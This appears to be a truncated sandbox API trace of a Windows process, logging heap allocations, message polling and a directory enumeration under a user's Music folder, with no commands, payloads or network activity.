[0157.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ec0 [0157.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8e2af8 [0157.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba900 | out: hHeap=0x8a0000) returned 1 [0157.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba900 [0157.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba900 | out: hHeap=0x8a0000) returned 1 [0157.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e70 | out: hHeap=0x8a0000) returned 1 [0157.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e30 | out: hHeap=0x8a0000) returned 1 [0157.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1e30 [0157.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba900 [0157.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1e70 [0157.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba930 [0157.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1e10 [0157.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba918 [0157.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ea0 [0157.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba948 [0157.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1f50 [0157.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1f20 [0157.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1f20 | out: hHeap=0x8a0000) returned 1 [0157.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1f50 | out: hHeap=0x8a0000) returned 1 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba960 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df230 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba9d8 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1f50 [0157.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba9d8 | out: hHeap=0x8a0000) returned 1 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df2d0 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1b8 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba9d8 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1f20 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba9f0 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba990 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df3e8 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba9a8 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1fb0 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df3c0 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba9c0 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1f70 [0157.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba9c0 | out: hHeap=0x8a0000) returned 1 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df2a8 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df348 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba9c0 [0157.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1f60 [0157.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba9c0 | out: hHeap=0x8a0000) returned 1 [0157.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df460 [0157.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df370 [0157.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba9c0 [0157.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1f10 [0157.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baa50 [0157.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db330 [0157.861] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df258 [0157.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baa68 [0157.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1f90 [0157.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baa08 [0157.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baa20 [0157.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df280 [0157.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baa38 [0157.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1f40 [0157.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba978 [0157.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baa98 [0157.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1f00 [0157.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baa98 | out: hHeap=0x8a0000) returned 1 [0157.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df410 [0157.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baa98 [0157.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1fd0 [0157.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baa80 [0157.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1f30 [0157.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baab0 [0157.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1f80 [0157.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9091f8 [0157.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baab0 | out: hHeap=0x8a0000) returned 1 [0157.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1f30 | out: hHeap=0x8a0000) returned 1 [0157.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1fd0 | out: hHeap=0x8a0000) returned 1 [0157.863] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\*", lpFindFileData=0x87e3d8 | out: lpFindFileData=0x87e3d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847a90, ftCreationTime.dwHighDateTime=0x1d5e0f0, ftLastAccessTime.dwLowDateTime=0x65d0360, ftLastAccessTime.dwHighDateTime=0x1d5deba, ftLastWriteTime.dwLowDateTime=0x65d0360, ftLastWriteTime.dwHighDateTime=0x1d5deba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90afd8 [0157.866] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3d8 | out: lpFindFileData=0x87e3d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847a90, ftCreationTime.dwHighDateTime=0x1d5e0f0, ftLastAccessTime.dwLowDateTime=0x65d0360, ftLastAccessTime.dwHighDateTime=0x1d5deba, ftLastWriteTime.dwLowDateTime=0x65d0360, ftLastWriteTime.dwHighDateTime=0x1d5deba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.866] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3d8 | out: lpFindFileData=0x87e3d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00a2c0, ftCreationTime.dwHighDateTime=0x1d5daea, ftLastAccessTime.dwLowDateTime=0x10c5a950, ftLastAccessTime.dwHighDateTime=0x1d5dfe2, ftLastWriteTime.dwLowDateTime=0x10c5a950, ftLastWriteTime.dwHighDateTime=0x1d5dfe2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName="ADuuj", cAlternateFileName="")) returned 1 [0157.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df320 [0157.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baab0 [0157.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1fd0 [0157.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9091f8 | out: hHeap=0x8a0000) returned 1 [0157.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1f80 | out: hHeap=0x8a0000) returned 1 [0157.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baa80 | out: hHeap=0x8a0000) returned 1 [0157.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baa98 | out: hHeap=0x8a0000) returned 1 [0157.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df410 | out: hHeap=0x8a0000) returned 1 [0157.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1f00 | out: hHeap=0x8a0000) returned 1 [0157.867] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1f00 [0157.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1f80 [0157.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1f30 [0157.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1f30 | out: hHeap=0x8a0000) returned 1 [0157.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1f80 | out: hHeap=0x8a0000) returned 1 [0157.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1f00 | out: hHeap=0x8a0000) returned 1 [0157.867] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1f00 [0157.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1f00 | out: hHeap=0x8a0000) returned 1 [0157.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0157.867] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1f00 [0157.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df410 [0157.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baa98 [0157.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1f80 [0157.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1f80 | out: hHeap=0x8a0000) returned 1 [0157.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baa80 [0157.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1f80 [0157.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baac8 [0157.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baa98 | out: hHeap=0x8a0000) returned 1 [0157.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df410 | out: hHeap=0x8a0000) returned 1 [0157.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1f00 | out: hHeap=0x8a0000) returned 1 [0157.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baa80 | out: hHeap=0x8a0000) returned 1 [0157.868] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1f00 [0157.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1f30 [0157.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1f30 | out: hHeap=0x8a0000) returned 1 [0157.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1f00 | out: hHeap=0x8a0000) returned 1 [0157.868] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1f00 [0157.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1f30 [0157.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1f30 | out: hHeap=0x8a0000) returned 1 [0157.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1f00 | out: hHeap=0x8a0000) returned 1 [0157.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0157.868] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1f00 [0157.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1f30 [0157.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1fc0 [0157.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ff0 [0157.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0157.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ff0 | out: hHeap=0x8a0000) returned 1 [0157.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1fc0 | out: hHeap=0x8a0000) returned 1 [0157.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0157.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1f30 | out: hHeap=0x8a0000) returned 1 [0157.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1f00 | out: hHeap=0x8a0000) returned 1 [0157.869] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1f00 [0157.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x8ee400 [0157.869] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee400 | out: hHeap=0x8a0000) returned 1 [0157.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1f00 | out: hHeap=0x8a0000) returned 1 [0157.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df410 [0157.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1f00 [0157.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df2f8 [0157.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baa80 [0157.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1f30 [0157.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baa98 [0157.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1fc0 [0157.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baae0 [0157.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ff0 [0157.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baaf8 [0157.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1fe0 [0157.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x9091f8 [0157.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baaf8 | out: hHeap=0x8a0000) returned 1 [0157.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baaf8 [0157.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baaf8 | out: hHeap=0x8a0000) returned 1 [0157.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ff0 | out: hHeap=0x8a0000) returned 1 [0157.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1fc0 | out: hHeap=0x8a0000) returned 1 [0157.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1fc0 [0157.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baaf8 [0157.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ff0 [0157.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bab10 [0157.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e2000 [0157.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bab28 [0157.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e2010 [0157.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bab40 [0157.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2020 [0157.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2030 [0157.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2030 | out: hHeap=0x8a0000) returned 1 [0157.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2020 | out: hHeap=0x8a0000) returned 1 [0157.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bab58 [0157.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df438 [0157.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bab70 [0157.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2020 [0157.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bab70 | out: hHeap=0x8a0000) returned 1 [0157.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df488 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df4b0 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bab70 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2030 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bab88 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9baba0 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df4d8 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9babb8 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2040 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df500 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9babd0 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2050 [0157.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9babd0 | out: hHeap=0x8a0000) returned 1 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df528 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df550 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9babd0 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2060 [0157.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9babd0 | out: hHeap=0x8a0000) returned 1 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df578 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df5a0 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9babd0 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2070 [0157.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9babe8 [0157.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0157.873] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df5c8 [0157.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bac00 [0157.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2080 [0157.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bac18 [0157.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bac30 [0157.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df5f0 [0157.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bac48 [0157.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2090 [0157.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bac60 [0157.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bac78 [0157.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e20a0 [0157.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac78 | out: hHeap=0x8a0000) returned 1 [0157.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df618 [0157.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bac78 [0157.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e20b0 [0157.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baca8 | out: hHeap=0x8a0000) returned 1 [0157.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20c0 | out: hHeap=0x8a0000) returned 1 [0157.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 